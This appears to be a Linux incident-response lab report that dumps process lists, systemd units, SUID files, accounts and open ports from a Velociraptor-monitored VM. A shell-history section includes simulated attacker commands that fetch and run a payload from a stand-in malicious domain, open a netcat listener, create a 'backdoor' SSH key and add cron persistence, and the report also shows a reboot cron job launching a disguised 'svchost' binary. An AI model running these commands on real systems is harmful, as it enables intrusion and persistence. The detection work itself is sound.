0.0 0.0 0 0 ? I 19:50 0:00 [kworker/u5:2-flush-8:0] root 25736 0.0 0.1 14348 6144 pts/0 S+ 19:51 0:00 sudo -i root 25737 0.0 0.0 14348 2512 pts/1 Ss 19:51 0:00 sudo -i root 25738 0.0 0.0 11396 5504 pts/1 S 19:51 0:00 -bash root 25808 0.0 0.0 0 0 ? I 19:53 0:00 [kworker/1:0] root 25833 0.0 0.0 0 0 ? I 19:55 0:00 [kworker/0:2-events] root 25836 0.0 0.0 0 0 ? I 19:55 0:00 [kworker/u5:3-writeback] root 25860 0.0 0.0 0 0 ? I< 19:59 0:00 [kworker/R-tls-s] root 25906 0.0 0.0 0 0 ? I 20:01 0:00 [kworker/0:0-events] champus+ 25992 2.8 0.5 398960 31332 ? SNsl 20:02 0:00 /usr/libexec/tracker-extract-3 root 25997 0.0 0.0 11396 3828 pts/1 S+ 20:02 0:00 -bash root 26004 0.0 0.0 12672 3456 pts/1 R+ 20:02 0:00 ps aux --------------------------------- List files: total 68 drwxrwxrwt 17 root root 4096 Nov 6 19:48 . drwxr-xr-x 20 root root 4096 Nov 6 20:01 .. drwxrwxrwt 2 root root 4096 Nov 6 11:09 .font-unix -rw------- 1 champuser champuser 0 Nov 6 11:09 gdm3-config-err-4Hw2lH drwxrwxrwt 2 root root 4096 Nov 6 11:09 .ICE-unix drwx------ 4 root root 4096 Nov 6 11:42 snap-private-tmp drwx------ 3 root root 4096 Nov 6 11:09 systemd-private-b6b81c1a49fd49b8b330e415ecc249d8-colord.service-hijiiC drwx------ 3 root root 4096 Nov 6 11:09 systemd-private-b6b81c1a49fd49b8b330e415ecc249d8-ModemManager.service-pubDje drwx------ 3 root root 4096 Nov 6 11:09 systemd-private-b6b81c1a49fd49b8b330e415ecc249d8-power-profiles-daemon.service-Msg1Aw drwx------ 3 root root 4096 Nov 6 11:09 systemd-private-b6b81c1a49fd49b8b330e415ecc249d8-switcheroo-control.service-vc6JUV drwx------ 3 root root 4096 Nov 6 11:09 systemd-private-b6b81c1a49fd49b8b330e415ecc249d8-systemd-logind.service-mRItdE drwx------ 3 root root 4096 Nov 6 11:09 systemd-private-b6b81c1a49fd49b8b330e415ecc249d8-systemd-oomd.service-ZSLhw3 drwx------ 3 root root 4096 Nov 6 11:09 systemd-private-b6b81c1a49fd49b8b330e415ecc249d8-systemd-resolved.service-qTOjod drwx------ 3 root root 4096 Nov 6 11:09 systemd-private-b6b81c1a49fd49b8b330e415ecc249d8-systemd-timesyncd.service-d7gdD4 drwx------ 3 root root 4096 Nov 6 11:09 systemd-private-b6b81c1a49fd49b8b330e415ecc249d8-upower.service-k0lchS drwxrwxrwt 2 root root 4096 Nov 6 11:09 .Test-unix drwxrwxrwt 2 root root 4096 Nov 6 11:09 .X11-unix drwxrwxrwt 2 root root 4096 Nov 6 11:09 .XIM-unix total 12 drwxr-xr-x 3 root root 4096 Nov 1 13:49 . drwxr-xr-x 20 root root 4096 Nov 6 20:01 .. drwx------ 16 root root 4096 Oct 4 16:23 velociraptor --------------------------------- List Update.custom UNIT LOAD ACTIVE SUB DESCRIPTION proc-sys-fs-binfmt_misc.automount loaded active running Arbitrary Executable File Formats File System Automount Point sys-devices-pci0000:00-0000:00:05.0-0000:01:01.0-virtio2-host0-target0:0:0-0:0:0:0-block-sda-sda1.device loaded active plugged QEMU_HARDDISK 1 sys-devices-pci0000:00-0000:00:05.0-0000:01:01.0-virtio2-host0-target0:0:0-0:0:0:0-block-sda-sda2.device loaded active plugged QEMU_HARDDISK EFI\x20System\x20Partition sys-devices-pci0000:00-0000:00:05.0-0000:01:01.0-virtio2-host0-target0:0:0-0:0:0:0-block-sda-sda3.device loaded active plugged QEMU_HARDDISK 3 sys-devices-pci0000:00-0000:00:05.0-0000:01:01.0-virtio2-host0-target0:0:0-0:0:0:0-block-sda.device loaded active plugged QEMU_HARDDISK sys-devices-pci0000:00-0000:00:12.0-virtio1-net-ens18.device loaded active plugged Virtio network device sys-devices-platform-serial8250-serial8250:0-serial8250:0.0-tty-ttyS0.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.0/tty/ttyS0 sys-devices-platform-serial8250-serial8250:0-serial8250:0.1-tty-ttyS1.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.1/tty/ttyS1 sys-devices-platform-serial8250-serial8250:0-serial8250:0.10-tty-ttyS10.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.10/tty/ttyS10 sys-devices-platform-serial8250-serial8250:0-serial8250:0.11-tty-ttyS11.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.11/tty/ttyS11 sys-devices-platform-serial8250-serial8250:0-serial8250:0.12-tty-ttyS12.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.12/tty/ttyS12 sys-devices-platform-serial8250-serial8250:0-serial8250:0.13-tty-ttyS13.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.13/tty/ttyS13 sys-devices-platform-serial8250-serial8250:0-serial8250:0.14-tty-ttyS14.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.14/tty/ttyS14 sys-devices-platform-serial8250-serial8250:0-serial8250:0.15-tty-ttyS15.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.15/tty/ttyS15 sys-devices-platform-serial8250-serial8250:0-serial8250:0.16-tty-ttyS16.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.16/tty/ttyS16 sys-devices-platform-serial8250-serial8250:0-serial8250:0.17-tty-ttyS17.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.17/tty/ttyS17 sys-devices-platform-serial8250-serial8250:0-serial8250:0.18-tty-ttyS18.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.18/tty/ttyS18 sys-devices-platform-serial8250-serial8250:0-serial8250:0.19-tty-ttyS19.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.19/tty/ttyS19 sys-devices-platform-serial8250-serial8250:0-serial8250:0.2-tty-ttyS2.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.2/tty/ttyS2 sys-devices-platform-serial8250-serial8250:0-serial8250:0.20-tty-ttyS20.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.20/tty/ttyS20 sys-devices-platform-serial8250-serial8250:0-serial8250:0.21-tty-ttyS21.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.21/tty/ttyS21 sys-devices-platform-serial8250-serial8250:0-serial8250:0.22-tty-ttyS22.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.22/tty/ttyS22 sys-devices-platform-serial8250-serial8250:0-serial8250:0.23-tty-ttyS23.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.23/tty/ttyS23 sys-devices-platform-serial8250-serial8250:0-serial8250:0.24-tty-ttyS24.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.24/tty/ttyS24 sys-devices-platform-serial8250-serial8250:0-serial8250:0.25-tty-ttyS25.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.25/tty/ttyS25 sys-devices-platform-serial8250-serial8250:0-serial8250:0.26-tty-ttyS26.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.26/tty/ttyS26 sys-devices-platform-serial8250-serial8250:0-serial8250:0.27-tty-ttyS27.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.27/tty/ttyS27 sys-devices-platform-serial8250-serial8250:0-serial8250:0.28-tty-ttyS28.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.28/tty/ttyS28 sys-devices-platform-serial8250-serial8250:0-serial8250:0.29-tty-ttyS29.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.29/tty/ttyS29 sys-devices-platform-serial8250-serial8250:0-serial8250:0.3-tty-ttyS3.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.3/tty/ttyS3 sys-devices-platform-serial8250-serial8250:0-serial8250:0.30-tty-ttyS30.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.30/tty/ttyS30 sys-devices-platform-serial8250-serial8250:0-serial8250:0.31-tty-ttyS31.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.31/tty/ttyS31 sys-devices-platform-serial8250-serial8250:0-serial8250:0.4-tty-ttyS4.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.4/tty/ttyS4 sys-devices-platform-serial8250-serial8250:0-serial8250:0.5-tty-ttyS5.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.5/tty/ttyS5 sys-devices-platform-serial8250-serial8250:0-serial8250:0.6-tty-ttyS6.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.6/tty/ttyS6 sys-devices-platform-serial8250-serial8250:0-serial8250:0.7-tty-ttyS7.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.7/tty/ttyS7 sys-devices-platform-serial8250-serial8250:0-serial8250:0.8-tty-ttyS8.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.8/tty/ttyS8 sys-devices-platform-serial8250-serial8250:0-serial8250:0.9-tty-ttyS9.device loaded active plugged /sys/devices/platform/serial8250/serial8250:0/serial8250:0.9/tty/ttyS9 sys-devices-virtual-block-loop0.device loaded active plugged /sys/devices/virtual/block/loop0 sys-devices-virtual-block-loop1.device loaded active plugged /sys/devices/virtual/block/loop1 sys-devices-virtual-block-loop10.device loaded active plugged /sys/devices/virtual/block/loop10 sys-devices-virtual-block-loop11.device loaded active plugged /sys/devices/virtual/block/loop11 sys-devices-virtual-block-loop12.device loaded active plugged /sys/devices/virtual/block/loop12 sys-devices-virtual-block-loop13.device loaded active plugged /sys/devices/virtual/block/loop13 sys-devices-virtual-block-loop2.device loaded active plugged /sys/devices/virtual/block/loop2 sys-devices-virtual-block-loop3.device loaded active plugged /sys/devices/virtual/block/loop3 sys-devices-virtual-block-loop4.device loaded active plugged /sys/devices/virtual/block/loop4 sys-devices-virtual-block-loop5.device loaded active plugged /sys/devices/virtual/block/loop5 sys-devices-virtual-block-loop6.device loaded active plugged /sys/devices/virtual/block/loop6 sys-devices-virtual-block-loop7.device loaded active plugged /sys/devices/virtual/block/loop7 sys-devices-virtual-block-loop8.device loaded active plugged /sys/devices/virtual/block/loop8 sys-devices-virtual-block-loop9.device loaded active plugged /sys/devices/virtual/block/loop9 sys-devices-virtual-misc-rfkill.device loaded active plugged /sys/devices/virtual/misc/rfkill sys-devices-virtual-tty-ttyprintk.device loaded active plugged /sys/devices/virtual/tty/ttyprintk sys-module-configfs.device loaded active plugged /sys/module/configfs sys-module-fuse.device loaded active plugged /sys/module/fuse sys-subsystem-net-devices-ens18.device loaded active plugged Virtio network device -.mount loaded active mounted Root Mount boot-efi.mount loaded active mounted /boot/efi dev-hugepages.mount loaded active mounted Huge Pages File System dev-mqueue.mount loaded active mounted POSIX Message Queue File System proc-sys-fs-binfmt_misc.mount loaded active mounted Arbitrary Executable File Formats File System run-credentials-systemd\x2dsysusers.service.mount loaded active mounted /run/credentials/systemd-sysusers.service run-snapd-ns-firefox.mnt.mount loaded active mounted /run/snapd/ns/firefox.mnt run-snapd-ns-snapd\x2ddesktop\x2dintegration.mnt.mount loaded active mounted /run/snapd/ns/snapd-desktop-integration.mnt run-snapd-ns.mount loaded active mounted /run/snapd/ns run-user-1000-doc.mount loaded active mounted /run/user/1000/doc run-user-1000-gvfs.mount loaded active mounted /run/user/1000/gvfs run-user-1000.mount loaded active mounted /run/user/1000 snap-bare-5.mount loaded active mounted Mount unit for bare, revision 5 snap-core22-2133.mount loaded active mounted Mount unit for core22, revision 2133 snap-core22-2139.mount loaded active mounted Mount unit for core22, revision 2139 snap-firefox-7084.mount loaded active mounted Mount unit for firefox, revision 7084 snap-firefox-7177.mount loaded active mounted Mount unit for firefox, revision 7177 snap-gnome\x2d42\x2d2204-202.mount loaded active mounted Mount unit for gnome-42-2204, revision 202 snap-gnome\x2d42\x2d2204-226.mount loaded active mounted Mount unit for gnome-42-2204, revision 226 snap-gtk\x2dcommon\x2dthemes-1535.mount loaded active mounted Mount unit for gtk-common-themes, revision 1535 snap-snap\x2dstore-1113.mount loaded active mounted Mount unit for snap-store, revision 1113 snap-snap\x2dstore-1216.mount loaded active mounted Mount unit for snap-store, revision 1216 snap-snapd-25202.mount loaded active mounted Mount unit for snapd, revision 25202 snap-snapd-25577.mount loaded active mounted Mount unit for snapd, revision 25577 snap-snapd\x2ddesktop\x2dintegration-178.mount loaded active mounted Mount unit for snapd-desktop-integration, revision 178 snap-snapd\x2ddesktop\x2dintegration-315.mount loaded active mounted Mount unit for snapd-desktop-integration, revision 315 sys-fs-fuse-connections.mount loaded active mounted FUSE Control File System sys-kernel-config.mount loaded active mounted Kernel Configuration File System sys-kernel-debug-tracing.mount loaded active mounted /sys/kernel/debug/tracing sys-kernel-debug.mount loaded active mounted Kernel Debug File System sys-kernel-tracing.mount loaded active mounted Kernel Trace File System acpid.path loaded active running ACPI Events Check cups.path loaded active running CUPS Scheduler systemd-ask-password-plymouth.path loaded active waiting Forward Password Requests to Plymouth Directory Watch systemd-ask-password-wall.path loaded active waiting Forward Password Requests to Wall Directory Watch whoopsie.path loaded active waiting Start whoopsie on modification of the /var/crash directory init.scope loaded active running System and Service Manager session-2.scope loaded active running Session 2 of User champuser accounts-daemon.service loaded active running Accounts Service acpid.service loaded active running ACPI event daemon apparmor.service loaded active exited Load AppArmor profiles apport.service loaded active exited LSB: automatic crash report generation auditd.service loaded active running Security Auditing Service avahi-daemon.service loaded active running Avahi mDNS/DNS-SD Stack colord.service loaded active running Manage, Install and Generate Color Profiles console-setup.service loaded active exited Set console font and keymap cron.service loaded active running Regular background program processing daemon cups-browsed.service loaded active running Make remote CUPS printers available locally cups.service loaded active running CUPS Scheduler dbus.service loaded active running D-Bus System Message Bus gdm.service loaded active running GNOME Display Manager irqbalance.service loaded active running irqbalance daemon kerneloops.service loaded active running Tool to automatically collect and submit kernel crash signatures keyboard-setup.service loaded active exited Set the console keyboard layout kmod-static-nodes.service loaded active exited Create List of Static Device Nodes ModemManager.service loaded active running Modem Manager networkd-dispatcher.service loaded active running Dispatcher daemon for systemd-networkd NetworkManager-wait-online.service loaded active exited Network Manager Wait Online NetworkManager.service loaded active running Network Manager openvpn.service loaded active exited OpenVPN service packagekit.service loaded active running PackageKit Daemon plymouth-quit-wait.service loaded active exited Hold until boot process finishes up plymouth-read-write.service loaded active exited Tell Plymouth To Write Out Runtime Data plymouth-start.service loaded active exited Show Plymouth Boot Screen podman-restart.service loaded active exited Podman Start All Containers With Restart Policy Set To Always polkit.service loaded active running Authorization Manager power-profiles-daemon.service loaded active running Power Profiles daemon rsyslog.service loaded active running System Logging Service rtkit-daemon.service loaded active running RealtimeKit Scheduling Policy Service setvtrgb.service loaded active exited Set console scheme snapd.apparmor.service loaded active exited Load AppArmor profiles managed internally by snapd snapd.seeded.service loaded active exited Wait until snapd is fully seeded snapd.service loaded active running Snap Daemon switcheroo-control.service loaded active running Switcheroo Control Proxy service systemd-binfmt.service loaded active exited Set Up Additional Binary Formats systemd-fsck@dev-disk-by\x2duuid-4015\x2d7165.service loaded active exited File System Check on /dev/disk/by-uuid/4015-7165 systemd-journal-flush.service loaded active exited Flush Journal to Persistent Storage systemd-journald.service loaded active running Journal Service systemd-logind.service loaded active running User Login Management systemd-modules-load.service loaded active exited Load Kernel Modules systemd-oomd.service loaded active running Userspace Out-Of-Memory (OOM) Killer systemd-random-seed.service loaded active exited Load/Save Random Seed systemd-remount-fs.service loaded active exited Remount Root and Kernel File Systems systemd-resolved.service loaded active running Network Name Resolution systemd-sysctl.service loaded active exited Apply Kernel Variables systemd-sysusers.service loaded active exited Create System Users systemd-timesyncd.service loaded active running Network Time Synchronization systemd-tmpfiles-setup-dev.service loaded active exited Create Static Device Nodes in /dev systemd-tmpfiles-setup.service loaded active exited Create Volatile Files and Directories systemd-udev-trigger.service loaded active exited Coldplug All udev Devices systemd-udevd.service loaded active running Rule-based Manager for Device Events and Files systemd-update-utmp.service loaded active exited Record System Boot/Shutdown in UTMP systemd-user-sessions.service loaded active exited Permit User Sessions udisks2.service loaded active running Disk Manager ufw.service loaded active exited Uncomplicated firewall unattended-upgrades.service loaded active running Unattended Upgrades Shutdown upower.service loaded active running Daemon for power management [email protected] loaded active exited User Runtime Directory /run/user/1000 [email protected] loaded active running User Manager for UID 1000 velociraptor.service loaded active running Velociraprot linux amd64 wpa_supplicant.service loaded active running WPA supplicant -.slice loaded active active Root Slice system-getty.slice loaded active active Slice /system/getty system-modprobe.slice loaded active active Slice /system/modprobe system-systemd\x2dfsck.slice loaded active active Slice /system/systemd-fsck system.slice loaded active active System Slice user-1000.slice loaded active active User Slice of UID 1000 user.slice loaded active active User and Session Slice acpid.socket loaded active running ACPID Listen Socket avahi-daemon.socket loaded active running Avahi mDNS/DNS-SD Stack Activation Socket cups.socket loaded active running CUPS Scheduler dbus.socket loaded active running D-Bus System Message Bus Socket podman.socket loaded active listening Podman API Socket snapd.socket loaded active running Socket activation for snappy daemon syslog.socket loaded active running Syslog Socket systemd-fsckd.socket loaded active listening fsck to fsckd communication Socket systemd-initctl.socket loaded active listening initctl Compatibility Named Pipe systemd-journald-audit.socket loaded active running Journal Audit Socket systemd-journald-dev-log.socket loaded active running Journal Socket (/dev/log) systemd-journald.socket loaded active running Journal Socket systemd-rfkill.socket loaded active listening Load/Save RF Kill Switch Status /dev/rfkill Watch systemd-udevd-control.socket loaded active running udev Control Socket systemd-udevd-kernel.socket loaded active running udev Kernel Socket uuidd.socket loaded active listening UUID daemon activation socket swapfile.swap loaded active active /swapfile basic.target loaded active active Basic System cryptsetup.target loaded active active Local Encrypted Volumes getty-pre.target loaded active active Preparation for Logins getty.target loaded active active Login Prompts graphical.target loaded active active Graphical Interface local-fs-pre.target loaded active active Preparation for Local File Systems local-fs.target loaded active active Local File Systems multi-user.target loaded active active Multi-User System network-online.target loaded active active Network is Online network-pre.target loaded active active Preparation for Network network.target loaded active active Network nss-lookup.target loaded active active Host and Network Name Lookups nss-user-lookup.target loaded active active User and Group Name Lookups paths.target loaded active active Path Units remote-fs.target loaded active active Remote File Systems slices.target loaded active active Slice Units snapd.mounts-pre.target loaded active active Mounting snaps snapd.mounts.target loaded active active Mounted snaps sockets.target loaded active active Socket Units swap.target loaded active active Swaps sysinit.target loaded active active System Initialization time-set.target loaded active active System Time Set timers.target loaded active active Timer Units veritysetup.target loaded active active Local Verity Protected Volumes anacron.timer loaded active waiting Trigger anacron every hour apt-daily-upgrade.timer loaded active waiting Daily apt upgrade and clean activities apt-daily.timer loaded active waiting Daily apt download activities dpkg-db-backup.timer loaded active waiting Daily dpkg database backup timer e2scrub_all.timer loaded active waiting Periodic ext4 Online Metadata Check for All Filesystems fstrim.timer loaded active waiting Discard unused blocks once a week fwupd-refresh.timer loaded active waiting Refresh fwupd metadata regularly logrotate.timer loaded active waiting Daily rotation of log files man-db.timer loaded active waiting Daily man-db regeneration motd-news.timer loaded active waiting Message of the Day podman-auto-update.timer loaded active waiting Podman auto-update timer systemd-tmpfiles-clean.timer loaded active waiting Daily Cleanup of Temporary Directories update-notifier-download.timer loaded active waiting Download data for packages that failed at package install time update-notifier-motd.timer loaded active waiting Check to see whether there is a new version of Ubuntu available LOAD = Reflects whether the unit definition was properly loaded. ACTIVE = The high-level unit activation state, i.e. generalization of SUB. SUB = The low-level unit activation state, values depend on unit type. 220 loaded units listed. Pass --all to see loaded but inactive units, too. To show all installed unit files use 'systemctl list-unit-files'. --------------------------------- CronJob @reboot /var/tmp/SecurityUpdate/svchost --------------------------------- suid /home/champuser/.local/share/containers/storage/overlay/073ec47a8c22dcaa4d6e5758799ccefe2f9bde943685830b1bf6fd2395f5eabc/diff/usr/bin/gpasswd /home/champuser/.local/share/containers/storage/overlay/073ec47a8c22dcaa4d6e5758799ccefe2f9bde943685830b1bf6fd2395f5eabc/diff/usr/bin/chfn /home/champuser/.local/share/containers/storage/overlay/073ec47a8c22dcaa4d6e5758799ccefe2f9bde943685830b1bf6fd2395f5eabc/diff/usr/bin/mount /home/champuser/.local/share/containers/storage/overlay/073ec47a8c22dcaa4d6e5758799ccefe2f9bde943685830b1bf6fd2395f5eabc/diff/usr/bin/newgrp /home/champuser/.local/share/containers/storage/overlay/073ec47a8c22dcaa4d6e5758799ccefe2f9bde943685830b1bf6fd2395f5eabc/diff/usr/bin/chsh /home/champuser/.local/share/containers/storage/overlay/073ec47a8c22dcaa4d6e5758799ccefe2f9bde943685830b1bf6fd2395f5eabc/diff/usr/bin/passwd /home/champuser/.local/share/containers/storage/overlay/073ec47a8c22dcaa4d6e5758799ccefe2f9bde943685830b1bf6fd2395f5eabc/diff/usr/bin/umount /home/champuser/.local/share/containers/storage/overlay/073ec47a8c22dcaa4d6e5758799ccefe2f9bde943685830b1bf6fd2395f5eabc/diff/usr/bin/su /snap/core22/2133/usr/bin/chfn /snap/core22/2133/usr/bin/chsh /snap/core22/2133/usr/bin/gpasswd /snap/core22/2133/usr/bin/mount /snap/core22/2133/usr/bin/newgrp /snap/core22/2133/usr/bin/passwd /snap/core22/2133/usr/bin/su /snap/core22/2133/usr/bin/sudo /snap/core22/2133/usr/bin/umount /snap/core22/2133/usr/lib/dbus-1.0/dbus-daemon-launch-helper /snap/core22/2133/usr/lib/openssh/ssh-keysign /snap/core22/2133/usr/libexec/polkit-agent-helper-1 /snap/core22/2139/usr/bin/chfn /snap/core22/2139/usr/bin/chsh /snap/core22/2139/usr/bin/gpasswd /snap/core22/2139/usr/bin/mount /snap/core22/2139/usr/bin/newgrp /snap/core22/2139/usr/bin/passwd /snap/core22/2139/usr/bin/su /snap/core22/2139/usr/bin/sudo /snap/core22/2139/usr/bin/umount /snap/core22/2139/usr/lib/dbus-1.0/dbus-daemon-launch-helper /snap/core22/2139/usr/lib/openssh/ssh-keysign /snap/core22/2139/usr/libexec/polkit-agent-helper-1 /usr/bin/fusermount3 /usr/bin/gpasswd /usr/bin/pkexec /usr/bin/chfn /usr/bin/mount /usr/bin/newuidmap /usr/bin/newgrp /usr/bin/chsh /usr/bin/passwd /usr/bin/newgidmap /usr/bin/umount /usr/bin/sudo /usr/bin/su /usr/libexec/polkit-agent-helper-1 /usr/sbin/pppd /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/openssh/ssh-keysign /usr/lib/snapd/snap-confine /usr/lib/xorg/Xorg.wrap --------------------------------- Malicious Commands chmod +x /usr/local/bin/velociraptor velociraptor config generate -i nano /root/server.config.yaml nano /lib/systemd/system/velociraptor.service systemctl daemon-reload systemctl enable --now velociraptor systemctl status velociraptor systemctl restart velociraptor.service nano /root/server.config.yaml systemctl restart velociraptor.service cls clear the key should be located in HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated however. The "Installer" section is non existent meaning the key doesnt exist for whatever reason I was only able to locate 17 registry keys using the hunt function. Lets move to windows now ls pwd cat server.config.yaml wget http://malicious-domain.com/payload.sh chmod +x payload.sh ./payload.sh nc -lvp 4444 ssh-keygen -t rsa -b 4096 -f /root/.ssh/backdoor_key -N "" echo "* * * * * /tmp/persistence.sh" \| crontab - cd .ssh cd /.ssh wget http://malicious-domain.com/payload.sh chmod +x payload.sh ./payload.sh nc -lvp 4444 ssh-keygen -t rsa -b 4096 -f /root/.ssh/backdoor_key -N "" echo "* * * * * /tmp/persistence.sh" \| crontab - apt install net-tools cls cleart clear install auditd apt install auditd clear wget https://raw.githubusercontent.com/Neo23x0/auditd/refs/heads/master/auditrules -O /etc/audit/rules.d/audit.rules clear wget https://raw.githubusercontent.com/Neo23x0/auditd/refs/heads/master/audit.rules -O /etc/audit/rules.d/audit.rules clear systemctl restart audit.d cleart clear systemctl restart auditd systemctl status auditd clear tail /var/log/audit/auditlog clear tail /var/log/audit/audit.log clear wget https://research.cyfidant.com clear cat /var/log/audit/audit.log \| grep wget clear grep wget /var/log/audit/audit.loc grep wget /var/log/audit/audit.log grep https://research.cyfidant.com /var/log/audit/audit.log

Prior to Execution

Post Execution

List User Accounts _apt avahi avahi-autoipd backup bin champuser colord cups-pk-helper daemon dnsmasq fwupd-refresh games gdm geoclue gnats gnome-initial-setup hplip irc kernoops list lp mail man messagebus news nm-openvpn nobody proxy pulse root rtkit saned speech-dispatcher sssd sync sys syslog systemd-network systemd-oom systemd-resolve systemd-timesync tcpdump tss usbmux uucp uuidd whoopsie www-data -------------------------------- Networks opening Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 10.0.17.48:8001 0.0.0.0:* LISTEN 721/velociraptor tcp 0 0 10.0.17.48:8003 0.0.0.0:* LISTEN 721/velociraptor tcp 0 0 10.0.17.48:8889 0.0.0.0:* LISTEN 721/velociraptor tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN 381/systemd-resolve tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN 645/cupsd tcp6 0 0 ::1:631 :::* LISTEN 645/cupsd tcp6 0 0 :::8000 :::* LISTEN 721/velociraptor udp 0 0 127.0.0.53:53 0.0.0.0:* 381/systemd-resolve udp 0 0 0.0.0.0:5353 0.0.0.0:* 491/avahi-daemon: r udp 0 0 0.0.0.0:51761 0.0.0.0:* 491/avahi-daemon: r udp6 0 0 :::44447 :::* 491/avahi-daemon: r udp6 0 0 :::5353 :::* 491/avahi-daemon: r raw6 0 0 :::58 :::* 7 496/NetworkManager --------------------------------- Local Groups Information root:x:0: daemon:x:1: bin:x:2: sys:x:3: adm:x:4:syslog,champuser tty:x:5: disk:x:6: lp:x:7: mail:x:8: news:x:9: uucp:x:10: man:x:12: proxy:x:13: kmem:x:15: dialout:x:20: fax:x:21: voice:x:22: cdrom:x:24:champuser floppy:x:25: tape:x:26: sudo:x:27:champuser audio:x:29:pulse dip:x:30:champuser www-data:x:33: backup:x:34: operator:x:37: list:x:38: irc:x:39: src:x:40: gnats:x:41: shadow:x:42: utmp:x:43: video:x:44: sasl:x:45: plugdev:x:46:champuser staff:x:50: games:x:60: users:x:100: nogroup:x:65534: systemd-journal:x:101: systemd-network:x:102: systemd-resolve:x:103: crontab:x:104: messagebus:x:105: systemd-timesync:x:106: input:x:107: sgx:x:108: kvm:x:109: render:x:110: syslog:x:111: _ssh:x:112: tss:x:113: bluetooth:x:114: ssl-cert:x:115: uuidd:x:116: systemd-oom:x:117: tcpdump:x:118: avahi-autoipd:x:119: netdev:x:120: avahi:x:121: lpadmin:x:122:champuser rtkit:x:123: whoopsie:x:124: sssd:x:125: fwupd-refresh:x:126: nm-openvpn:x:127: scanner:x:128:saned saned:x:129: colord:x:130: geoclue:x:131: pulse:x:132: pulse-access:x:133: gdm:x:134: lxd:x:135:champuser champuser:x:1000: sambashare:x:136:champuser --------------------------------- services UNIT LOAD ACTIVE SUB DESCRIPTION accounts-daemon.service loaded active running Accounts Service acpid.service loaded active running ACPI event daemon apparmor.service loaded active exited Load AppArmor profiles apport.service loaded active exited LSB: automatic crash report generation auditd.service loaded active running Security Auditing Service avahi-daemon.service loaded active running Avahi mDNS/DNS-SD Stack colord.service loaded active running Manage, Install and Generate Color Profiles console-setup.service loaded active exited Set console font and keymap cron.service loaded active running Regular background program processing daemon cups-browsed.service loaded active running Make remote CUPS printers available locally cups.service loaded active running CUPS Scheduler dbus.service loaded active running D-Bus System Message Bus gdm.service loaded active running GNOME Display Manager irqbalance.service loaded active running irqbalance daemon kerneloops.service loaded active running Tool to automatically collect and submit kernel crash signatures keyboard-setup.service loaded active exited Set the console keyboard layout kmod-static-nodes.service loaded active exited Create List of Static Device Nodes ModemManager.service loaded active running Modem Manager networkd-dispatcher.service loaded active running Dispatcher daemon for systemd-networkd NetworkManager-wait-online.service loaded active exited Network Manager Wait Online NetworkManager.service loaded active running Network Manager openvpn.service loaded active exited OpenVPN service packagekit.service loaded active running PackageKit Daemon plymouth-quit-wait.service loaded active exited Hold until boot process finishes up plymouth-read-write.service loaded active exited Tell Plymouth To Write Out Runtime Data plymouth-start.service loaded active exited Show Plymouth Boot Screen podman-restart.service loaded active exited Podman Start All Containers With Restart Policy Set To Always polkit.service loaded active running Authorization Manager power-profiles-daemon.service loaded active running Power Profiles daemon rsyslog.service loaded active running System Logging Service rtkit-daemon.service loaded active running RealtimeKit Scheduling Policy Service setvtrgb.service loaded active exited Set console scheme snapd.apparmor.service loaded active exited Load AppArmor profiles managed internally by snapd snapd.seeded.service loaded active exited Wait until snapd is fully seeded snapd.service loaded active running Snap Daemon switcheroo-control.service loaded active running Switcheroo Control Proxy service systemd-binfmt.service loaded active exited Set Up Additional Binary Formats systemd-fsck@dev-disk-by\x2duuid-4015\x2d7165.service loaded active exited File System Check on /dev/disk/by-uuid/4015-7165 systemd-journal-flush.service loaded active exited Flush Journal to Persistent Storage systemd-journald.service loaded active running Journal Service systemd-logind.service loaded active running User Login Management systemd-modules-load.service loaded active exited Load Kernel Modules systemd-oomd.service loaded active running Userspace Out-Of-Memory (OOM) Killer systemd-random-seed.service loaded active exited Load/Save Random Seed systemd-remount-fs.service loaded active exited Remount Root and Kernel File Systems systemd-resolved.service loaded active running Network Name Resolution systemd-sysctl.service loaded active exited Apply Kernel Variables systemd-sysusers.service loaded active exited Create System Users systemd-timesyncd.service loaded active running Network Time Synchronization systemd-tmpfiles-setup-dev.service loaded active exited Create Static Device Nodes in /dev systemd-tmpfiles-setup.service loaded active exited Create Volatile Files and Directories systemd-udev-trigger.service loaded active exited 